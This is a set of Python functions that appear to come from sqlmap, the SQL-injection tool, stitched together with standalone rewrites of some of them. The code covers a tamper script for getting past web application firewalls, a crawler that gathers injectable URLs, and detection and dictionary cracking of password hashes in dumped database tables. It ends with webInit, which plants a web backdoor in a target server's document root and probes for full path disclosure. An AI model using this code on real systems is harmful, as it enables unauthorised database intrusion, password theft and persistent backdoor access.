def tamper(payload, **kwargs):
    """
    Adds multiple spaces (' ') around SQL keywords

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that have poorly written permissive regular expressions

    Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

    >>> random.seed(0)
    >>> tamper('1 UNION SELECT foobar')
    '1 UNION SELECT foobar'
    """

    retVal = payload

    if payload:
        words = OrderedSet()

        for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
            word = match.group()

            if word.upper() in kb.keywords:
                words.add(word)

        for word in words:
            retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal)
            retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal)

    return retVal
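
# A minimal standalone sketch (not sqlmap itself) of the keyword-padding idea used by
# tamper() above; KEYWORDS is a made-up stand-in for kb.keywords and only the
# non-function-call branch is shown.
import random
import re

KEYWORDS = {"UNION", "SELECT", "FROM", "WHERE"}  # assumption: tiny keyword list

def pad_keywords(payload):
    result = payload
    words = [m.group() for m in re.finditer(r"\b[A-Za-z_]+\b", payload)]
    for word in dict.fromkeys(w for w in words if w.upper() in KEYWORDS):  # ordered, unique
        # surround each keyword occurrence with 1-4 random spaces on both sides
        result = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word,
                        "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)),
                        result)
    return result

# pad_keywords("1 UNION SELECT foobar") might return '1   UNION  SELECT    foobar'
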
def storeHashesToFile(attack_dict):
    if not attack_dict:
        return

    items = OrderedSet()

    for user, hashes in attack_dict.items():
        for hash_ in hashes:
            hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_

            if hash_ and hash_ != NULL and hashRecognition(hash_):
                item = None

                if user and not user.startswith(DUMMY_USER_PREFIX):
                    item = "%s:%s\n" % (user.encode(UNICODE_ENCODING), hash_.encode(UNICODE_ENCODING))
                else:
                    item = "%s\n" % hash_.encode(UNICODE_ENCODING)

                if item and item not in items:
                    items.add(item)

    if kb.storeHashesChoice is None:
        message = "do you want to store hashes to a temporary file "
        message += "for eventual further processing with other tools [y/N] "

        kb.storeHashesChoice = readInput(message, default='N', boolean=True)

    if items and kb.storeHashesChoice:
        handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.HASHES, suffix=".txt")
        os.close(handle)

        infoMsg = "writing hashes to a temporary file '%s' " % filename
        logger.info(infoMsg)

        with open(filename, "w+") as f:
            for item in items:
                f.write(item)
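
# A standalone sketch (with made-up sample data) of the pattern used by
# storeHashesToFile() above: deduplicate "user:hash" lines while preserving
# insertion order, then persist them to a securely created temporary file.
import os
import tempfile

def write_unique_lines(lines, prefix="sqlmaphashes-"):
    # dict keys preserve insertion order (Python 3.7+) - a simple ordered set
    unique = dict.fromkeys(lines)
    handle, filename = tempfile.mkstemp(prefix=prefix, suffix=".txt")
    os.close(handle)  # mkstemp returns an open OS-level handle; close it first
    with open(filename, "w") as f:
        for line in unique:
            f.write(line + "\n")
    return filename

# Example: write_unique_lines(["admin:5f4dcc3b5aa765d61d8327deb882cf99"])
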
def parseSitemap(url, retVal=None):
    global abortedFlag

    if retVal is not None:
        logger.debug("parsing sitemap '%s'" % url)

    try:
        if retVal is None:
            abortedFlag = False
            retVal = OrderedSet()

        try:
            content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
        except _http_client.InvalidURL:
            errMsg = "invalid URL given for sitemap ('%s')" % url
            raise SqlmapSyntaxException(errMsg)

        for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
            if abortedFlag:
                break

            url = match.group(1).strip()

            if url.endswith(".xml") and "sitemap" in url.lower():
                if kb.followSitemapRecursion is None:
                    message = "sitemap recursion detected. Do you want to follow? [y/N] "
                    kb.followSitemapRecursion = readInput(message, default='N', boolean=True)

                if kb.followSitemapRecursion:
                    parseSitemap(url, retVal)
            else:
                retVal.add(url)

    except KeyboardInterrupt:
        abortedFlag = True
        warnMsg = "user aborted during sitemap parsing. sqlmap "
        warnMsg += "will use partial list"
        logger.warn(warnMsg)

    return retVal
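
# A standalone sketch of the recursive sitemap walk performed by parseSitemap()
# above, using plain urllib instead of sqlmap's Request wrapper; error handling
# and user prompting are deliberately omitted.
import re
from urllib.request import urlopen

def parse_sitemap(url, collected=None):
    collected = collected if collected is not None else []
    content = urlopen(url).read().decode("utf-8", "replace")
    for match in re.finditer(r"<loc>\s*([^<]+)", content):
        loc = match.group(1).strip()
        if loc.endswith(".xml") and "sitemap" in loc.lower():
            parse_sitemap(loc, collected)  # nested sitemap index entry - recurse
        elif loc not in collected:
            collected.append(loc)
    return collected
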
def crawl(target):
    try:
        visited = set()
        threadData = getCurrentThreadData()
        threadData.shared.value = OrderedSet()
        threadData.shared.formsFound = False

        def crawlThread():
            threadData = getCurrentThreadData()

            while kb.threadContinue:
                with kb.locks.limit:
                    if threadData.shared.unprocessed:
                        current = threadData.shared.unprocessed.pop()
                        if current in visited:
                            continue
                        elif conf.crawlExclude and re.search(conf.crawlExclude, current):
                            dbgMsg = "skipping '%s'" % current
                            logger.debug(dbgMsg)
                            continue
                        else:
                            visited.add(current)
                    else:
                        break

                content = None

                try:
                    if current:
                        content = Request.getPage(url=current, crawling=True, raise404=False)[0]
                except SqlmapConnectionException as ex:
                    errMsg = "connection exception detected ('%s'). skipping " % getSafeExString(ex)
                    errMsg += "URL '%s'" % current
                    logger.critical(errMsg)
                except SqlmapSyntaxException:
                    errMsg = "invalid URL detected. skipping '%s'" % current
                    logger.critical(errMsg)
                except _http_client.InvalidURL as ex:
                    errMsg = "invalid URL detected ('%s'). skipping " % getSafeExString(ex)
                    errMsg += "URL '%s'" % current
                    logger.critical(errMsg)

                if not kb.threadContinue:
                    break

                if isinstance(content, six.text_type):
                    try:
                        match = re.search(r"(?si)<html[^>]*>(.+)</html>", content)
                        if match:
                            content = "<html>%s</html>" % match.group(1)

                        soup = BeautifulSoup(content)
                        tags = soup('a')

                        tags += re.finditer(r'(?i)\s(href|src)=["\'](?P<href>[^>"\']+)', content)
                        tags += re.finditer(r'(?i)window\.open\(["\'](?P<href>[^)"\']+)["\']', content)

                        for tag in tags:
                            href = tag.get("href") if hasattr(tag, "get") else tag.group("href")

                            if href:
                                if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
                                    current = threadData.lastRedirectURL[1]
                                url = _urllib.parse.urljoin(current, htmlUnescape(href))

                                # flag to know if we are dealing with the same target host
                                _ = checkSameHost(url, target)

                                if conf.scope:
                                    if not re.search(conf.scope, url, re.I):
                                        continue
                                elif not _:
                                    continue

                                if (extractRegexResult(r"\A[^?]+\.(?P<result>\w+)(\?|\Z)", url) or "").lower() not in CRAWL_EXCLUDE_EXTENSIONS:
                                    with kb.locks.value:
                                        threadData.shared.deeper.add(url)
                                        if re.search(r"(.*?)\?(.+)", url) and not re.search(r"\?(v=)?\d+\Z", url) and not re.search(r"(?i)\.(js|css)(\?|\Z)", url):
                                            threadData.shared.value.add(url)
                    except UnicodeEncodeError:  # for non-HTML files
                        pass
                    except ValueError:  # for non-valid links
                        pass
                    finally:
                        if conf.forms:
                            threadData.shared.formsFound |= len(findPageForms(content, current, False, True)) > 0

                if conf.verbose in (1, 2):
                    threadData.shared.count += 1
                    status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length))
                    dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)

        threadData.shared.deeper = set()
        threadData.shared.unprocessed = set([target])

        if kb.checkSitemap is None:
            message = "do you want to check for the existence of "
            message += "site's sitemap(.xml) [y/N] "
            kb.checkSitemap = readInput(message, default='N', boolean=True)

        if kb.checkSitemap:
            found = True
            items = None
            url = _urllib.parse.urljoin(target, "/sitemap.xml")

            try:
                items = parseSitemap(url)
            except SqlmapConnectionException as ex:
                if "page not found" in getSafeExString(ex):
                    found = False
                    logger.warn("'sitemap.xml' not found")
            except:
                pass
            finally:
                if found:
                    if items:
                        for item in items:
                            if re.search(r"(.*?)\?(.+)", item):
                                threadData.shared.value.add(item)

                        if conf.crawlDepth > 1:
                            threadData.shared.unprocessed.update(items)

                    logger.info("%s links found" % ("no" if not items else len(items)))

        if not conf.bulkFile:
            infoMsg = "starting crawler for target URL '%s'" % target
            logger.info(infoMsg)

        for i in xrange(conf.crawlDepth):
            threadData.shared.count = 0
            threadData.shared.length = len(threadData.shared.unprocessed)
            numThreads = min(conf.threads, len(threadData.shared.unprocessed))

            if not conf.bulkFile:
                logger.info("searching for links with depth %d" % (i + 1))

            runThreads(numThreads, crawlThread, threadChoice=(i > 0))
            clearConsoleLine(True)

            if threadData.shared.deeper:
                threadData.shared.unprocessed = set(threadData.shared.deeper)
            else:
                break

    except KeyboardInterrupt:
        warnMsg = "user aborted during crawling. sqlmap "
        warnMsg += "will use partial list"
        logger.warn(warnMsg)

    finally:
        clearConsoleLine(True)

        if not threadData.shared.value:
            if not (conf.forms and threadData.shared.formsFound):
                warnMsg = "no usable links found (with GET parameters)"
                if conf.forms:
                    warnMsg += " or forms"
                logger.warn(warnMsg)
        else:
            for url in threadData.shared.value:
                kb.targets.add((urldecode(url, kb.pageEncoding), None, None, None, None))

        if kb.targets:
            if kb.normalizeCrawlingChoice is None:
                message = "do you want to normalize "
                message += "crawling results [Y/n] "

                kb.normalizeCrawlingChoice = readInput(message, default='Y', boolean=True)

            if kb.normalizeCrawlingChoice:
                seen = set()
                results = OrderedSet()

                for target in kb.targets:
                    if target[1] in (HTTPMETHOD.GET, None):
                        match = re.search(r"/[^/?]*\?.*\Z", target[0])
                        if match:
                            key = re.sub(r"=[^=&]*", "=", match.group(0)).strip('&')
                            if key not in seen:
                                results.add(target)
                                seen.add(key)
                    else:
                        results.add(target)

                kb.targets = results

        storeResultsToFile(kb.targets)
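
# A standalone sketch of the normalization step at the end of crawl() above:
# two URLs that differ only in parameter *values* produce the same key, so only
# the first one is kept (sample URLs are made up).
import re

def normalize(urls):
    seen = set()
    results = []
    for url in urls:
        match = re.search(r"/[^/?]*\?.*\Z", url)
        if match:
            # strip parameter values: "/cat.php?id=1&sort=asc" -> "/cat.php?id=&sort="
            key = re.sub(r"=[^=&]*", "=", match.group(0)).strip('&')
            if key in seen:
                continue
            seen.add(key)
        results.append(url)
    return results

# normalize(["http://t/cat.php?id=1", "http://t/cat.php?id=2"]) keeps only the first
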
def attackDumpedTable():
    if kb.data.dumpedTable:
        table = kb.data.dumpedTable
        columns = list(table.keys())
        count = table["__infos__"]["count"]

        if not count:
            return

        debugMsg = "analyzing table dump for possible password hashes"
        logger.debug(debugMsg)

        found = False
        col_user = ''
        col_passwords = set()
        attack_dict = {}
        binary_fields = OrderedSet()
        replacements = {}

        for column in sorted(columns, key=len, reverse=True):
            if column and column.lower() in COMMON_USER_COLUMNS:
                col_user = column
                break

        for column in columns:
            if column != "__infos__" and table[column]["values"]:
                if all(INVALID_UNICODE_CHAR_FORMAT.split('%')[0] in (value or "") for value in table[column]["values"]):
                    binary_fields.add(column)

        if binary_fields:
            _ = ','.join(binary_fields)
            warnMsg = "potential binary fields detected ('%s'). In case of any problems you are " % _
            warnMsg += "advised to rerun table dump with '--fresh-queries --binary-fields=\"%s\"'" % _
            logger.warn(warnMsg)

        for i in xrange(count):
            if not found and i > HASH_RECOGNITION_QUIT_THRESHOLD:
                break

            for column in columns:
                if column == col_user or column == "__infos__":
                    continue

                if len(table[column]["values"]) <= i:
                    continue

                if conf.binaryFields and column in conf.binaryFields:
                    continue

                value = table[column]["values"][i]

                if column in binary_fields and re.search(HASH_BINARY_COLUMNS_REGEX, column) is not None:
                    previous = value
                    value = encodeHex(getBytes(value), binary=False)
                    replacements[value] = previous

                if hashRecognition(value):
                    found = True

                    if col_user and i < len(table[col_user]["values"]):
                        if table[col_user]["values"][i] not in attack_dict:
                            attack_dict[table[col_user]["values"][i]] = []

                        attack_dict[table[col_user]["values"][i]].append(value)
                    else:
                        attack_dict["%s%d" % (DUMMY_USER_PREFIX, i)] = [value]

                    col_passwords.add(column)

        if attack_dict:
            infoMsg = "recognized possible password hashes in column%s " % ("s" if len(col_passwords) > 1 else "")
            infoMsg += "'%s'" % ", ".join(col for col in col_passwords)
            logger.info(infoMsg)

            storeHashesToFile(attack_dict)

            message = "do you want to crack them via a dictionary-based attack? %s" % ("[y/N/q]" if conf.multipleTargets else "[Y/n/q]")
            choice = readInput(message, default='N' if conf.multipleTargets else 'Y').upper()

            if choice == 'N':
                return
            elif choice == 'Q':
                raise SqlmapUserQuitException

            results = dictionaryAttack(attack_dict)
            lut = dict()

            for (_, hash_, password) in results:
                if hash_:
                    key = hash_ if hash_ not in replacements else replacements[hash_]
                    lut[key.lower()] = password
                    lut["0x%s" % key.lower()] = password

            debugMsg = "post-processing table dump"
            logger.debug(debugMsg)

            for i in xrange(count):
                for column in columns:
                    if not (column == col_user or column == '__infos__' or len(table[column]['values']) <= i):
                        value = table[column]['values'][i]

                        if value and value.lower() in lut:
                            table[column]['values'][i] = "%s (%s)" % (getUnicode(table[column]['values'][i]), getUnicode(lut[value.lower()] or HASH_EMPTY_PASSWORD_MARKER))
                            table[column]['length'] = max(table[column]['length'], len(table[column]['values'][i]))
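
# A standalone sketch of the post-processing step in attackDumpedTable() above:
# cracked (hash, password) pairs become a case-insensitive lookup table that is
# then used to annotate the dumped values in place (sample data is made up).
def annotate_cracked(values, cracked):
    # cracked: iterable of (hash, password) pairs coming out of the attack
    lut = {}
    for hash_, password in cracked:
        lut[hash_.lower()] = password
        lut["0x%s" % hash_.lower()] = password  # hex-literal variant of the same hash
    return ["%s (%s)" % (v, lut[v.lower()]) if v and v.lower() in lut else v
            for v in values]

# annotate_cracked(["5F4DCC3B5AA765D61D8327DEB882CF99"],
#                  [("5f4dcc3b5aa765d61d8327deb882cf99", "password")])
# -> ['5F4DCC3B5AA765D61D8327DEB882CF99 (password)']
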
def main():
    """
    Main function of sqlmap when running from command line.
    """

    try:
        dirtyPatches()
        resolveCrossReferences()
        checkEnvironment()
        setPaths(modulePath())
        banner()

        # Store original command line options for possible later restoration
        args = cmdLineParser()
        cmdLineOptions.update(args.__dict__ if hasattr(args, "__dict__") else args)
        initOptions(cmdLineOptions)

        if checkPipedInput():
            conf.batch = True

        if conf.get("api"):
            # heavy imports
            from lib.utils.api import StdDbOut
            from lib.utils.api import setRestAPILog

            # Overwrite system standard output and standard error to write
            # to an IPC database
            sys.stdout = StdDbOut(conf.taskid, messagetype="stdout")
            sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
            setRestAPILog()

        conf.showTime = True
        dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
        dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True)

        init()

        if not conf.updateAll:
            # Postponed imports (faster start)
            if conf.smokeTest:
                from lib.core.testing import smokeTest
                os._exitcode = 1 - (smokeTest() or 0)
            elif conf.vulnTest:
                from lib.core.testing import vulnTest
                os._exitcode = 1 - (vulnTest() or 0)
            else:
                from lib.controller.controller import start

                if conf.profile:
                    from lib.core.profiling import profile
                    globals()["start"] = start
                    profile()
                else:
                    try:
                        if conf.crawlDepth and conf.bulkFile:
                            targets = getFileItems(conf.bulkFile)

                            for i in xrange(len(targets)):
                                target = None

                                try:
                                    kb.targets = OrderedSet()
                                    target = targets[i]

                                    if not re.search(r"(?i)\Ahttp[s]*://", target):
                                        target = "http://%s" % target

                                    infoMsg = "starting crawler for target URL '%s' (%d/%d)" % (target, i + 1, len(targets))
                                    logger.info(infoMsg)

                                    crawl(target)
                                except Exception as ex:
                                    if target and not isinstance(ex, SqlmapUserQuitException):
                                        errMsg = "problem occurred while crawling '%s' ('%s')" % (target, getSafeExString(ex))
                                        logger.error(errMsg)
                                    else:
                                        raise
                                else:
                                    if kb.targets:
                                        start()
                        else:
                            start()
                    except Exception as ex:
                        os._exitcode = 1

                        if "can't start new thread" in getSafeExString(ex):
                            errMsg = "unable to start new threads. Please check OS (u)limits"
                            logger.critical(errMsg)
                            raise SystemExit
                        else:
                            raise

    except SqlmapUserQuitException:
        if not conf.batch:
            errMsg = "user quit"
            logger.error(errMsg)

    except (SqlmapSilentQuitException, bdb.BdbQuit):
        pass

    except SqlmapShellQuitException:
        cmdLineOptions.sqlmapShell = False

    except SqlmapBaseException as ex:
        errMsg = getSafeExString(ex)
        logger.critical(errMsg)

        os._exitcode = 1

        raise SystemExit

    except KeyboardInterrupt:
        print()

    except EOFError:
        print()

        errMsg = "exit"
        logger.error(errMsg)

    except SystemExit as ex:
        os._exitcode = ex.code or 0

    except:
        print()
        errMsg = unhandledExceptionMessage()
        excMsg = traceback.format_exc()
        valid = checkIntegrity()

        os._exitcode = 255

        if any(_ in excMsg for _ in ("MemoryError", "Cannot allocate memory")):
            errMsg = "memory exhaustion detected"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded", "Disk full while accessing")):
            errMsg = "no space left on output device"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("The paging file is too small",)):
            errMsg = "no space left for paging file"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Access is denied", "subprocess", "metasploit")):
            errMsg = "permission error occurred while running Metasploit"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Permission denied", "metasploit")):
            errMsg = "permission error occurred while using Metasploit"
            logger.critical(errMsg)
            raise SystemExit

        elif "Read-only file system" in excMsg:
            errMsg = "output device is mounted as read-only"
            logger.critical(errMsg)
            raise SystemExit

        elif "Insufficient system resources" in excMsg:
            errMsg = "resource exhaustion detected"
            logger.critical(errMsg)
            raise SystemExit

        elif "OperationalError: disk I/O error" in excMsg:
            errMsg = "I/O error on output device"
            logger.critical(errMsg)
            raise SystemExit

        elif "Violation of BIDI" in excMsg:
            errMsg = "invalid URL (violation of Bidi IDNA rule - RFC 5893)"
            logger.critical(errMsg)
            raise SystemExit

        elif "Invalid IPv6 URL" in excMsg:
            errMsg = "invalid URL ('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif "_mkstemp_inner" in excMsg:
            errMsg = "there has been a problem while accessing temporary files"
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("tempfile.mkdtemp", "tempfile.mkstemp", "tempfile.py")):
            errMsg = "unable to write to the temporary directory '%s'. " % tempfile.gettempdir()
            errMsg += "Please make sure that your disk is not full and "
            errMsg += "that you have sufficient write permissions to "
            errMsg += "create temporary files and/or directories"
            logger.critical(errMsg)
            raise SystemExit

        elif "Permission denied: '" in excMsg:
            match = re.search(r"Permission denied: '([^']*)", excMsg)
            errMsg = "permission error occurred while accessing file '%s'" % match.group(1)
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("twophase", "sqlalchemy")):
            errMsg = "please update the 'sqlalchemy' package (>= 1.1.11) "
            errMsg += "(Reference: 'https://qiita.com/tkprof/items/7d7b2d00df9c5f16fffe')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("scramble_caching_sha2", "TypeError")):
            errMsg = "please downgrade the 'PyMySQL' package (=< 0.8.1) "
            errMsg += "(Reference: 'https://github.com/PyMySQL/PyMySQL/issues/700')"
            logger.critical(errMsg)
            raise SystemExit

        elif "must be pinned buffer, not bytearray" in excMsg:
            errMsg = "error occurred at Python interpreter which "
            errMsg += "is fixed in 2.7. Please update accordingly "
            errMsg += "(Reference: 'https://bugs.python.org/issue8104')"
            logger.critical(errMsg)
            raise SystemExit

        elif "hash_randomization" in excMsg:
            errMsg = "error occurred at Python interpreter which "
            errMsg += "is fixed in 2.7.3. Please update accordingly "
            errMsg += "(Reference: 'https://docs.python.org/2/library/sys.html')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("Resource temporarily unavailable", "os.fork()", "dictionaryAttack")):
            errMsg = "there has been a problem while running the multiprocessing hash cracking. "
            errMsg += "Please rerun with option '--threads=1'"
            logger.critical(errMsg)
            raise SystemExit

        elif "can't start new thread" in excMsg:
            errMsg = "there has been a problem while creating new thread instance. "
            errMsg += "Please make sure that you are not running too many processes"
            if not IS_WIN:
                errMsg += " (or increase the 'ulimit -u' value)"
            logger.critical(errMsg)
            raise SystemExit

        elif "can't allocate read lock" in excMsg:
            errMsg = "there has been a problem in regular socket operation "
            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("pymysql", "configparser")):
            errMsg = "wrong initialization of pymysql detected (using Python3 dependencies)"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("ntlm", "socket.error, err", "SyntaxError")):
            errMsg = "wrong initialization of python-ntlm detected (using Python2 syntax)"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("drda", "to_bytes")):
            errMsg = "wrong initialization of drda detected (using Python3 syntax)"
            logger.critical(errMsg)
            raise SystemExit

        elif "'WebSocket' object has no attribute 'status'" in excMsg:
            errMsg = "wrong websocket library detected"
            errMsg += " (Reference: 'https://github.com/sqlmapproject/sqlmap/issues/4572#issuecomment-775041086')"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("window = tkinter.Tk()",)):
            errMsg = "there has been a problem in initialization of GUI interface "
            errMsg += "('%s')" % excMsg.strip().split('\n')[-1]
            logger.critical(errMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("unable to access item 'liveTest'",)):
            errMsg = "detected usage of files from different versions of sqlmap"
            logger.critical(errMsg)
            raise SystemExit

        elif kb.get("dumpKeyboardInterrupt"):
            raise SystemExit

        elif any(_ in excMsg for _ in ("Broken pipe",)):
            raise SystemExit

        elif valid is False:
            errMsg = "code integrity check failed (turning off automatic issue creation). "
            errMsg += "You should retrieve the latest development version from official GitHub "
            errMsg += "repository at '%s'" % GIT_PAGE
            logger.critical(errMsg)
            print()
            dataToStdout(excMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("tamper/", "waf/")):
            logger.critical(errMsg)
            print()
            dataToStdout(excMsg)
            raise SystemExit

        elif any(_ in excMsg for _ in ("ImportError", "ModuleNotFoundError", "Can't find file for module", "SAXReaderNotAvailable", "source code string cannot contain null bytes", "No module named", "tp_name field")):
            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("SyntaxError: Non-ASCII character", ".py on line", "but no encoding declared")):
            errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip()
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("No such file", "_'")):
            errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1]
            errMsg += "You should retrieve the latest development version from official GitHub "
            errMsg += "repository at '%s'" % GIT_PAGE
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("No such file", "sqlmap.conf", "Test")):
            errMsg = "you are trying to run (hidden) development tests inside the production environment"
            logger.critical(errMsg)
            raise SystemExit

        elif all(_ in excMsg for _ in ("HTTPNtlmAuthHandler", "'str' object has no attribute 'decode'")):
            errMsg = "package 'python-ntlm' has a known compatibility issue with the "
            errMsg += "Python 3 (Reference: 'https://github.com/mullender/python-ntlm/pull/61')"
            logger.critical(errMsg)
            raise SystemExit

        elif "'DictObject' object has no attribute '" in excMsg and all(_ in errMsg for _ in ("(fingerprinted)", "(identified)")):
            errMsg = "there has been a problem in enumeration. "
            errMsg += "Because of a considerable chance of false-positive case "
            errMsg += "you are advised to rerun with switch '--flush-session'"
            logger.critical(errMsg)
            raise SystemExit

        elif "AttributeError: 'module' object has no attribute 'F_GETFD'" in excMsg:
            errMsg = "invalid runtime (\"%s\") " % excMsg.split("Error: ")[-1].strip()
            errMsg += "(Reference: 'https://stackoverflow.com/a/38841364' & 'https://bugs.python.org/issue24944#msg249231')"
            logger.critical(errMsg)
            raise SystemExit

        elif "bad marshal data (unknown type code)" in excMsg:
            match = re.search(r"\s*(.+)\s+ValueError", excMsg)
            errMsg = "one of your .pyc files is corrupted%s" % (" ('%s')" % match.group(1) if match else "")
            errMsg += ". Please delete .pyc files on your system to fix the problem"
            logger.critical(errMsg)
            raise SystemExit

        for match in re.finditer(r'File "(.+?)", line', excMsg):
            file_ = match.group(1)

            try:
                file_ = os.path.relpath(file_, os.path.dirname(__file__))
            except ValueError:
                pass

            file_ = file_.replace("\\", '/')

            if "../" in file_:
                file_ = re.sub(r"(\.\./)+", '/', file_)
            else:
                file_ = file_.lstrip('/')

            file_ = re.sub(r"/{2,}", '/', file_)
            excMsg = excMsg.replace(match.group(1), file_)

        errMsg = maskSensitiveData(errMsg)
        excMsg = maskSensitiveData(excMsg)

        if conf.get("api") or not valid:
            logger.critical("%s\n%s" % (errMsg, excMsg))
        else:
            logger.critical(errMsg)
            dataToStdout("%s\n" % setColor(excMsg.strip(), level=logging.CRITICAL))
            createGithubIssue(errMsg, excMsg)

    finally:
        kb.threadContinue = False

        if getDaysFromLastUpdate() > LAST_UPDATE_NAGGING_DAYS:
            warnMsg = "your sqlmap version is outdated"
            logger.warn(warnMsg)

        if conf.get("showTime"):
            dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True)

        kb.threadException = True

        if kb.get("tempDir"):
            for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):
                for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)):
                    try:
                        os.remove(filepath)
                    except OSError:
                        pass

            if not filterNone(filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in (".lock", ".exe", ".so", '_'))):  # ignore junk files
                try:
                    shutil.rmtree(kb.tempDir, ignore_errors=True)
                except OSError:
                    pass

        if conf.get("hashDB"):
            conf.hashDB.flush(True)
            conf.hashDB.close()  # NOTE: because of PyPy

        if conf.get("harFile"):
            try:
                with openFile(conf.harFile, "w+b") as f:
                    json.dump(conf.httpCollector.obtain(), fp=f, indent=4, separators=(',', ': '))
            except SqlmapBaseException as ex:
                errMsg = getSafeExString(ex)
                logger.critical(errMsg)

        if conf.get("api"):
            conf.databaseCursor.disconnect()

        if conf.get("dumper"):
            conf.dumper.flush()

        # short delay for thread finalization
        _ = time.time()
        while threading.active_count() > 1 and (time.time() - _) <= THREAD_FINALIZATION_TIMEOUT:
            time.sleep(0.01)

        if cmdLineOptions.get("sqlmapShell"):
            cmdLineOptions.clear()
            conf.clear()
            kb.clear()
            conf.disableBanner = True
            main()
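
# A standalone sketch of the traceback sanitization loop near the end of main()
# above: absolute file paths inside an exception message are rewritten as short
# relative ones before the report is printed or submitted.
import os
import re

def relativize_traceback_paths(exc_msg, base_dir):
    for match in re.finditer(r'File "(.+?)", line', exc_msg):
        path = match.group(1)
        try:
            path = os.path.relpath(path, base_dir)
        except ValueError:  # e.g. paths on different drives on Windows
            pass
        path = path.replace("\\", '/')
        if "../" in path:
            path = re.sub(r"(\.\./)+", '/', path)  # collapse parent-directory hops
        else:
            path = path.lstrip('/')
        path = re.sub(r"/{2,}", '/', path)
        exc_msg = exc_msg.replace(match.group(1), path)
    return exc_msg
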
def webInit(self):
    """
    This method is used to write a web backdoor (agent) on a writable
    remote directory within the web server document root.
    """

    if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webPlatform is not None:
        return

    self.checkDbmsOs()

    default = None
    choices = list(getPublicTypeMembers(WEB_PLATFORM, True))

    for ext in choices:
        if conf.url.endswith(ext):
            default = ext
            break

    if not default:
        default = WEB_PLATFORM.ASP if Backend.isOs(OS.WINDOWS) else WEB_PLATFORM.PHP

    message = "which web application language does the web server "
    message += "support?\n"

    for count in xrange(len(choices)):
        ext = choices[count]
        message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))

        if default == ext:
            default = count + 1

    message = message[:-1]

    while True:
        choice = readInput(message, default=str(default))

        if not choice.isdigit():
            logger.warn("invalid value, only digits are allowed")
        elif int(choice) < 1 or int(choice) > len(choices):
            logger.warn("invalid value, it must be between 1 and %d" % len(choices))
        else:
            self.webPlatform = choices[int(choice) - 1]
            break

    if not kb.absFilePaths:
        message = "do you want sqlmap to further try to "
        message += "provoke the full path disclosure? [Y/n] "

        if readInput(message, default='Y', boolean=True):
            headers = {}
            been = set([conf.url])

            for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
                url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")

                if url not in been:
                    try:
                        page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
                        parseFilePaths(page)
                    except:
                        pass
                    finally:
                        been.add(url)

            url = re.sub(r"(\.\w+)\Z", r"~\g<1>", conf.url)

            if url not in been:
                try:
                    page, _, _ = Request.getPage(url=url, raise404=False, silent=True)
                    parseFilePaths(page)
                except:
                    pass
                finally:
                    been.add(url)

            for place in (PLACE.GET, PLACE.POST):
                if place in conf.parameters:
                    value = re.sub(r"(\A|&)(\w+)=", r"\g<2>[]=", conf.parameters[place])

                    if "[]" in value:
                        page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
                        parseFilePaths(page)

